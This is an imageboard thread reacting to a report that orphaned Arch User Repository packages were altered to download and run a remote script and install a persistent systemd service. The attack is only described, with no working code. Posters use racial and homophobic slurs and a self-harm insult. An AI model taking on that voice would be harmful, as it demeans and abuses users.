"Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that a malicious user with the nick namexeactormodified in June 7 an orphaned package (software without an active maintainer) calledacroraed. The changes included acurlscript that downloads and runs a script from a remote site. This installs a persistent software that reconfiguressystemdin order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distribution have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed.
>Install Arch Linux! The AUR has everything you need! >W-w-wait a minute don't use the AUR and it's not part of arch
Cameron Peterson
>Adobe Reader fucking neck yourself
Oliver Jackson
Nobody said that you must use AUR. I don't use it myself.
Sebastian Cooper
>explicitly states it's not curated and everything you do there is a matter of personal responsibility >it's basically not different from using a random ass ppa
i don't even use arch but you're a fag. people are joking about AUR malware for years now, it's only the first actual proof for something everyone knew
Dylan Davis
You say that, but the AUR is the only thing that makes arch usable.
Benjamin Adams
t. brainlet
Angel Price
>just installed a few days ago >just got settled in
>if you install this OS and then do something stupid you're explicitly advised against doing, bad things can happen >this is the fault of the OS
Robert James
So Arch is compromised, Gentoo is compromised... What is /ourdistro/ now Jow Forums?
Xavier Murphy
Link to where you got that from?
Alexander Taylor
>Github mirror >compromised What did he mean by this?
Parker Murphy
Neither are compromised though.
But the answer is GuixSD.
Caleb Bennett
If you want to create malware for Arch, you can do this in 2 mins, just create a new package on the AUR. This is how the AUR works, stop baiting, retard.
Carter Parker
I just looked in pamac and turns out I've had it disabled. Just in time with this post as I was about to go back to ubuntu.
Dylan Richardson
>no hardware support yeah no
Anthony Nguyen
it uses the same kernel as all the other distros you dumb fuck
Luke Russell
>mfw autistically read every ebuild from out of tree overlays before copying it into my own and never touching the original overlay again if something is going to screw me over it is some chucklefuck adding an extra space in an rm -rf or a malicious commit to a popular project like ffmpeg
I bet this faggot came to Jow Forums because 'le based glow in dark nigger man xD'
Landon Williams
>>Install Arch Linux! The AUR has everything you need! Said literally no one, ever. I've never once needed to look in the AUR for anything.
Ethan Nguyen
Having AUR enabled in pamac doesn't put you in danger. Installing compromised packages does.
Alexander Gomez
>malware
I thought this was yet another systemd thread.
Robert Taylor
OpenSUSE
Christian Wood
If you can't read code, the popular AUR packages are generally safe. It's the zero votes packages that you have to watch out for, and usually they are just a simple script or whatever. AUR is a great community tool and is what makes arch arch. If you get bot-netted you deserve it
Dylan Allen
Does anyobdy else besides programmers use Arch Linux unironically? No wonder why retards get malware.
Oliver Russell
ReactOS
Joseph Evans
install macOS, the one true linux distro
Jack Carter
>Adobe Reader What 30 year old boomerware is that?
Daniel Wilson
It's not like the AUR doesn't advertise checking the PKGBUILD or install scripts before building a package. Everything is there to see.
Matthew Hall
Linux users of all distributions have received a major warning not to explicitly trust >not to explicitly trust Literally the English you'd expect from an Arch babby.
Connor Sanchez
Why do you keep making this retarded thread
Alexander Smith
>Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions Man, if you're gonna try to spread FUD bullshit, at least get your facts right.. It was found within about 8 hours, not "several days". And the installed script was literally nonfunctional because the author was a retard. Literally harmless, and a fantastic warning not to blindly trust shit off the internet because next time it will be actually bad.
And on that note, where's your nonsense about random PPAs for Debian-based distros, Fedora's user repos, downloading random exes off the internet for Windows, etc etc? I think you might just be a retard, OP.
Eli Turner
>download random obscure code from public repository(AUR, GitHub, sourceforge, whatever) >run it without checking what's doing >it's a virus >how could it happen?
Honestly, I trust more in packages in AUR that have some ability to be curated via votes than in random ppa repositories like you need to in ubuntu or Debian that a guide told you to install
Samuel Edwards
Apple Macbook doesn't have this problem
Nathan Flores
Weird windows doesn't have this problem?
Carson Walker
have you been living under a rock for the past 30 years?
Adam Ortiz
No i just have windows 10 Enterprise with ATP
Adrian Powell
No, it uses Linux-Libre.
Adam Rivera
>install .exe from sketchy website, get virus >complain on Jow Forums about Windows containing malware >complain about the usefulness of Windows package management if random sketchy .exes could be viruses
This is how you faggots sound.
Pro tip for the genuinely curious: It takes 30 seconds to look at a PKGBUILD and see what URL it points to. If you don't trust the host, don't install the program. If reading a small text file to get an idea of what it says sounds like too much work for you, buy a Mac.
Joshua Wood
If this is just now notable news then I'd say that means the AUR is in a good state
>>it's basically not different from using a random ass ppa it sure as hell IS different than a random ppa which is a binary which you have to jump tru hoops to even maybe be able to examine pkgbuilds are just scripts which you can and should easily read
Chase Morris
templeos
Liam Ward
also doesn't have internet
Nicholas Rivera
>users of all distributions have received a major warning not to explicitly trust >DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk. aur.archlinux.org/
Nah, that's not the interesting part. I've had the following experience: >Arch repos are shit and have no software (rstudio, Firefox ESR and so on) >AUR has everything! We don't need it in the repos. >Dont use AUR, it's unofficial!
>Firefox ESR >aur and you're wrong my observation is that there is almost nothing in the aur that is used by majority of users besides shit like discord and skype which should stay there
not esr but you shouldn't be using the aur for it anyway
Charles Gutierrez
>and you're wrong You sure? >Should stay there You can reread my previous post again, user. And you should try reading the post before you get triggered.
sorry no images but you could paste that if it's text and ye im sure it's dumb to grab ff esr from the aur if you need something else that's there, i don't see an issue unless the script is broken and you can't fix it yourself but my observation is correct, the majority of users use almost nothing from the aur
Christopher Johnson
This just makes me glad I moved away from Arch in favor of Opensuse. What are the odds the open build service would have packages with spooky surprises baked in?
Jace Lewis
>sorry no images but you could paste that if it's text It's a screenshot that shows there is no Firefox ESR in the repos. >the majority of users use almost nothing from the aur If that's the reasoning, they can remove everything that is not Base-System/DE/Office/Chrome from the main repos, as that's what majority is using.
Brayden Edwards
>no Firefox ESR in the repos. didn't say there was plenty of things in the repos ppl use there are some things in the aur which would be better to be in the repos but those are few my observation stands
Gavin Cruz
>didn't say there was You literally said it here: >My observation 1. Is unfounded 2. Doesn't bring anything new to the table You are basically saying "Doesn't matter", so only reiterates my Greentext in the original post.
>You literally said it here: (You)# doesnt say there is esr in rep implies it's dumb to use aur for ff oh my observation is very founded in the years of usage and chatter with people if the table is your post then it accomplishes it's goal to shit all over it the ppl who do use aur a lot are those who use manjaro
Leo Sanchez
You might want to rewrite your post, I think your autocorrect is faulty and I don't quite understand most of it. >Using aur is stupid If you propose to compile from source manually, then what's the point of AUR at all? In the end this leaves us with a very shitty vanilla repos.
Daniel Clark
what's stopping you from getting a stock kernel from kernel.org you dip?
Liam Russell
Debian GNU/Linux
why do you need anything more? Afraid to do things yourself?
Leo Flores
>>Using aur is stupid come on mang i didn't write that >you propose to compile from source manually where?
Xavier Rivera
>not reading pkgbuilds
Curl | bash is the most obvious malicious code, it wasn't even obfuscated in the slightest. Only idiots would've gotten hit with this
Aaron Young
the point of the aur is to host/share things missing from the repo or things no repo maintainer wants to maintain the danger is ppl like op don't read what they're about to run and then make a big deal about it the inconvenience is that a pkg script may require something tricky because one of it's dependencies is obsolete [the dependency] (because the pkg is aimed at deb/untu) or something
Anthony Gomez
This. But anyways, only a retard would install Adobe Reader in the first place.
It's literally the default behavior for installing windows software without a way to easily update third party software.
Bentley Rodriguez
1 click installers.
Isaiah White
If someone puts malware in an Opensuse repo there isn't anyway of knowing. In arch you can just look at the build file and make sure it downloading code from the proper place. This is blown out of proportion. If you want to use Opensuse use Gecko instead so you'll have media codes out of the box.
Ian Myers
>The changes included a curl script that downloads and runs a script from a remote site. How """advanced""" The snapd miner was better and even then, it shows how hopeless the attackers against the OS itself.